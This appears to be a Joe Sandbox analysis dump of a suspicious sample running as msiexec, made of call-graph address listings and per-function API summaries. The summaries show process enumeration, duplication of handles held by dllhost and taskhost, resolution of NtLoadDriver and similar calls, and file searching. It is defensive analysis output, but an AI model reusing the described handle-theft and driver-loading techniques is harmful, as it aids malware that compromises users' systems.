39821->39781 39821->39818 39976 42370b memset memcpy memset 39821->39976 39823 43adcc 39978 440f84 12 API calls 39823->39978 39824 43ae96 39981 42e1c0 146 API calls 39824->39981 39827 43aea8 39828 43aec1 39827->39828 39982 42e199 146 API calls 39827->39982 39829 43af00 39828->39829 39983 42e1c0 146 API calls 39828->39983 39829->39781 39833 43af1a 39829->39833 39834 43b3d9 39829->39834 39984 438eed 16 API calls 39833->39984 39840 43b3f6 39834->39840 39842 43b4c8 39834->39842 39836 43b60f 39836->39781 40043 4393a5 17 API calls 39836->40043 39838 43af2f 39985 4233c5 16 API calls 39838->39985 40025 432878 12 API calls 39840->40025 39841 43af51 39986 423426 11 API calls 39841->39986 39844 43b4f2 39842->39844 40031 42bbd5 memcpy memcpy memcpy memset memcpy 39842->40031 40032 43a76c 21 API calls 39844->40032 39846 43af7d 39987 423426 11 API calls 39846->39987 39850 43b529 40033 44081d 162 API calls 39850->40033 39851 43b462 40027 423330 11 API calls 39851->40027 39852 43af94 39988 423330 11 API calls 39852->39988 39856 43afca 39989 423330 11 API calls 39856->39989 39857 43b47e 39861 43b497 39857->39861 40028 42374a memcpy memset memcpy memcpy memcpy 39857->40028 39858 43b544 39862 43b55c 39858->39862 40034 42c02e memset 39858->40034 39859 43b428 39859->39851 40026 432b60 16 API calls 39859->40026 40029 4233ae 11 API calls 39861->40029 40035 43a87a 162 API calls 39862->40035 39863 43afdb 39990 4233ae 11 API calls 39863->39990 39869 43b56c 39872 43b58a 39869->39872 40036 423330 11 API calls 39869->40036 39870 43b4b1 40030 423399 11 API calls 39870->40030 39871 43afee 39991 44081d 162 API calls 39871->39991 40037 440f84 12 API calls 39872->40037 39874 43b4c1 40039 42db80 162 API calls 39874->40039 39879 43b592 40038 43a82f 16 API calls 39879->40038 39882 43b5b4 40040 438c4e 162 API calls 39882->40040 39884 43b5cf 40041 42c02e memset 39884->40041 39886 43b005 39886->39781 39890 43b01f 39886->39890 39992 42d836 162 API calls 39886->39992 39887 43b1ef 40002 4233c5 16 API calls 39887->40002 39890->39887 40000 423330 11 API calls 39890->40000 40001 42d71d 162 API calls 39890->40001 39891 43b212 40003 423330 11 API calls 39891->40003 39892 43b087 39993 4233ae 11 API calls 39892->39993 39893 43add4 39893->39836 40042 438f86 16 API calls 39893->40042 39897 43b22a 40004 42ccb5 11 API calls 39897->40004 39900 43b23f 40005 4233ae 11 API calls 39900->40005 39901 43b10f 39996 423330 11 API calls 39901->39996 39903 43b257 40006 4233ae 11 API calls 39903->40006 39907 43b129 39997 4233ae 11 API calls 39907->39997 39908 43b26e 40007 4233ae 11 API calls 39908->40007 39911 43b09a 39911->39901 39994 42cc15 19 API calls 39911->39994 39995 4233ae 11 API calls 39911->39995 39912 43b282 40008 43a87a 162 API calls 39912->40008 39914 43b13c 39998 440f84 12 API calls 39914->39998 39916 43b29d 40009 423330 11 API calls 39916->40009 39919 43b15f 39999 4233ae 11 API calls 39919->39999 39920 43b2af 39922 43b2b8 39920->39922 39923 43b2ce 39920->39923 40010 4233ae 11 API calls 39922->40010 40011 440f84 12 API calls 39923->40011 39926 43b2c9 40013 4233ae 11 API calls 39926->40013 39927 43b2da 40012 42370b memset memcpy memset 39927->40012 39930 43b2f9 40014 423330 11 API calls 39930->40014 39932 43b30b 40015 423330 11 API calls 39932->40015 39934 43b325 40016 423399 11 API calls 39934->40016 39936 43b332 40017 4233ae 11 API calls 39936->40017 39938 43b354 40018 423399 11 API calls 39938->40018 39940 43b364 40019 43a82f 16 API calls 39940->40019 39942 43b370 40020 42db80 162 API calls 39942->40020 39944 43b380 40021 438c4e 162 API calls 39944->40021 39946 43b39e 40022 423399 11 API calls 39946->40022 39948 43b3ae 40023 43a76c 21 API calls 39948->40023 39950 43b3c3 40024 423399 11 API calls 39950->40024 39952->39773 39953->39775 39954->39776 39956 43a6f5 39955->39956 39957 43a765 39955->39957 39956->39957 40044 42a115 39956->40044 39957->39781 39964 4397fd memset 39957->39964 39961 43a73d 39961->39957 39962 42a115 146 API calls 39961->39962 39962->39957 39963->39783 39964->39790 39965->39781 39966->39805 39967->39794 39968->39799 39969->39795 39970->39798 39971->39803 39972->39807 39973->39809 39974->39812 39975->39821 39976->39818 39977->39823 39978->39893 39979->39815 39980->39824 39981->39827 39982->39828 39983->39828 39984->39838 39985->39841 39986->39846 39987->39852 39988->39856 39989->39863 39990->39871 39991->39886 39992->39892 39993->39911 39994->39911 39995->39911 39996->39907 39997->39914 39998->39919 39999->39890 40000->39890 40001->39890 40002->39891 40003->39897 40004->39900 40005->39903 40006->39908 40007->39912 40008->39916 40009->39920 40010->39926 40011->39927 40012->39926 40013->39930 40014->39932 40015->39934 40016->39936 40017->39938 40018->39940 40019->39942 40020->39944 40021->39946 40022->39948 40023->39950 40024->39893 40025->39859 40026->39851 40027->39857 40028->39861 40029->39870 40030->39874 40031->39844 40032->39850 40033->39858 40034->39862 40035->39869 40036->39872 40037->39879 40038->39874 40039->39882 40040->39884 40041->39893 40042->39836 40043->39781 40045 42a175 40044->40045 40047 42a122 40044->40047 40045->39957 40050 42b13b 146 API calls 40045->40050 40047->40045 40048 42a115 146 API calls 40047->40048 40051 43a174 40047->40051 40075 42a0a8 146 API calls 40047->40075 40048->40047 40050->39961 40065 43a196 40051->40065 40066 43a19e 40051->40066 40052 43a306 40052->40065 40095 4388c4 14 API calls 40052->40095 40055 42a115 146 API calls 40055->40066 40057 43a642 40057->40065 40099 4169a7 11 API calls 40057->40099 40061 43a635 40098 42c02e memset 40061->40098 40065->40047 40066->40052 40066->40055 40066->40065 40076 42ff8c 40066->40076 40084 415a91 40066->40084 40088 4165ff 40066->40088 40091 439504 13 API calls 40066->40091 40092 4312d0 146 API calls 40066->40092 40093 42be4c memcpy memcpy memcpy memset memcpy 40066->40093 40094 43a121 11 API calls 40066->40094 40068 42bf4c 14 API calls 40070 43a325 40068->40070 40069 4169a7 11 API calls 40069->40070 40070->40057 40070->40061 40070->40065 40070->40068 40070->40069 40071 42b5b5 memset memcpy 40070->40071 40074 4165ff 11 API calls 40070->40074 40096 42b63e 14 API calls 40070->40096 40097 42bfcf memcpy 40070->40097 40071->40070 40074->40070 40075->40047 40100 43817e 40076->40100 40078 42ff9d 40078->40066 40079 42ff99 40079->40078 40080 42ffe3 40079->40080 40081 42ffd0 40079->40081 40105 4169a7 11 API calls 40080->40105 40104 4169a7 11 API calls 40081->40104 40085 415a9d 40084->40085 40086 415ab3 40085->40086 40087 415aa4 memset 40085->40087 40086->40066 40087->40086 40256 4165a0 40088->40256 40091->40066 40092->40066 40093->40066 40094->40066 40095->40070 40096->40070 40097->40070 40098->40057 40099->40065 40101 438187 40100->40101 40103 438192 40100->40103 40106 4380f6 40101->40106 40103->40079 40104->40078 40105->40078 40108 43811f 40106->40108 40107 438164 40107->40103 40108->40107 40111 437e5e 40108->40111 40134 4300e8 memset memset memcpy 40108->40134 40135 437d3c 40111->40135 40113 437eb3 40113->40108 40114 437ea9 40114->40113 40120 437f22 40114->40120 40150 41f432 40114->40150 40117 437f06 40197 415c56 11 API calls 40117->40197 40118 437f7f 40121 437f95 40118->40121 40124 43802b 40118->40124 40120->40118 40122 432d4e 3 API calls 40120->40122 40198 415c56 11 API calls 40121->40198 40122->40118 40125 4165ff 11 API calls 40124->40125 40126 438054 40125->40126 40161 437371 40126->40161 40129 43806b 40130 438094 40129->40130 40199 42f50e 137 API calls 40129->40199 40132 437fa3 40130->40132 40200 4300e8 memset memset memcpy 40130->40200 40132->40113 40201 41f638 103 API calls 40132->40201 40134->40108 40136 437d69 40135->40136 40139 437d80 40135->40139 40202 437ccb 11 API calls 40136->40202 40138 437d76 40138->40114 40139->40138 40140 437da3 40139->40140 40141 437d90 40139->40141 40143 438460 133 API calls 40140->40143 40141->40138 40206 437ccb 11 API calls 40141->40206 40146 437dcb 40143->40146 40144 437de8 40205 424f26 122 API calls 40144->40205 40146->40144 40203 444283 13 API calls 40146->40203 40148 437dfc 40204 437ccb 11 API calls 40148->40204 40151 41f54d 40150->40151 40157 41f44f 40150->40157 40152 41f466 40151->40152 40236 41c635 memset memset 40151->40236 40152->40117 40152->40120 40157->40152 40159 41f50b 40157->40159 40207 41f1a5 40157->40207 40232 41c06f memcmp 40157->40232 40233 41f3b1 89 API calls 40157->40233 40234 41f398 85 API calls 40157->40234 40159->40151 40159->40152 40235 41c295 85 API calls 40159->40235 40237 41703f 40161->40237 40163 437399 40164 43739d 40163->40164 40166 4373ac 40163->40166 40244 4446ea 11 API calls 40164->40244 40167 416935 16 API calls 40166->40167 40168 4373ca 40167->40168 40170 438460 133 API calls 40168->40170 40174 4251c4 136 API calls 40168->40174 40178 415a91 memset 40168->40178 40181 43758f 40168->40181 40193 437584 40168->40193 40196 437d3c 134 API calls 40168->40196 40245 425433 13 API calls 40168->40245 40246 425413 17 API calls 40168->40246 40247 42533e 16 API calls 40168->40247 40248 42538f 16 API calls 40168->40248 40249 42453e 122 API calls 40168->40249 40169 4375bc 40252 415c7d 16 API calls 40169->40252 40170->40168 40173 4375d2 40195 4373a7 40173->40195 40253 4442e6 11 API calls 40173->40253 40174->40168 40176 4375e2 40176->40195 40254 444283 13 API calls 40176->40254 40178->40168 40250 42453e 122 API calls 40181->40250 40182 4375f4 40187 437620 40182->40187 40188 43760b 40182->40188 40186 43759f 40189 416935 16 API calls 40186->40189 40191 416935 16 API calls 40187->40191 40255 444283 13 API calls 40188->40255 40189->40193 40191->40195 40193->40169 40251 42453e 122 API calls 40193->40251 40194 437612 memcpy 40194->40195 40195->40129 40196->40168 40197->40113 40198->40132 40199->40130 40200->40132 40201->40113 40202->40138 40203->40148 40204->40144 40205->40138 40206->40138 40208 41bc3b 100 API calls 40207->40208 40209 41f1b4 40208->40209 40210 41edad 85 API calls 40209->40210 40217 41f282 40209->40217 40211 41f1cb 40210->40211 40212 41f1f5 memcmp 40211->40212 40213 41f20e 40211->40213 40211->40217 40212->40213 40214 41f21b memcmp 40213->40214 40213->40217 40215 41f326 40214->40215 40218 41f23d 40214->40218 40216 41ee6b 85 API calls 40215->40216 40215->40217 40216->40217 40217->40157 40218->40215 40219 41f28e memcmp 40218->40219 40221 41c8df 55 API calls 40218->40221 40219->40215 40220 41f2a9 40219->40220 40220->40215 40223 41f308 40220->40223 40224 41f2d8 40220->40224 40222 41f269 40221->40222 40222->40215 40225 41f287 40222->40225 40226 41f27a 40222->40226 40223->40215 40230 4446ce 11 API calls 40223->40230 40227 41ee6b 85 API calls 40224->40227 40225->40219 40228 41ee6b 85 API calls 40226->40228 40229 41f2e0 40227->40229 40228->40217 40231 41b1ca memset 40229->40231 40230->40215 40231->40217 40232->40157 40233->40157 40234->40157 40235->40151 40236->40152 40238 417044 40237->40238 40239 41705c 40237->40239 40241 416760 11 API calls 40238->40241 40243 417055 40238->40243 40240 417075 40239->40240 40242 41707a 11 API calls 40239->40242 40240->40163 40241->40243 40242->40238 40243->40163 40244->40195 40245->40168 40246->40168 40247->40168 40248->40168 40249->40168 40250->40186 40251->40169 40252->40173 40253->40176 40254->40182 40255->40194 40261 415cfe 40256->40261 40265 415d23 __aullrem __aulldvrm 40261->40265 40268 41628e 40261->40268 40262 4163ca 40275 416422 11 API calls 40262->40275 40264 416172 memset 40264->40265 40265->40262 40265->40264 40266 416422 10 API calls 40265->40266 40267 415cb9 10 API calls 40265->40267 40265->40268 40266->40265 40267->40265 40269 416520 40268->40269 40270 416527 40269->40270 40274 416574 40269->40274 40272 416544 40270->40272 40270->40274 40276 4156aa 11 API calls 40270->40276 40273 416561 memcpy 40272->40273 40272->40274 40273->40274 40274->40066 40275->40268 40276->40272 40298 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39755 4147f3 39758 414561 39755->39758 39757 414813 39759 41456d 39758->39759 39760 41457f GetPrivateProfileIntW 39758->39760 39763 4143f1 memset _itow WritePrivateProfileStringW 39759->39763 39760->39757 39762 41457a 39762->39757 39763->39762

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                            • API String ID: 708747863-3398334509
                                                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 655 413ee4 649->655 656 413ee7-413efe 649->656 663 413ea2-413eae CloseHandle 651->663 653 413e61-413e68 652->653 654 413e37-413e44 GetModuleHandleW 652->654 653->651 660 413e6a-413e76 653->660 654->653 659 413e46-413e5c GetProcAddress 654->659 655->656 656->639 659->653 660->651 663->642
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                            • memset.MSVCRT ref: 00413D7F
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                            • memset.MSVCRT ref: 00413E07
                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                            • free.MSVCRT ref: 00413EC1
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                            • API String ID: 1344430650-1740548384
                                                                                                            • Opcode ID: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
                                                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                            • Opcode Fuzzy Hash: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
                                                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                            APIs
                                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                            • String ID:
                                                                                                            • API String ID: 3473537107-0
                                                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                            APIs
                                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                            • free.MSVCRT ref: 00418803
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1355100292-0
                                                                                                            • Opcode ID: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                            • Opcode Fuzzy Hash: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1690352074-0
                                                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
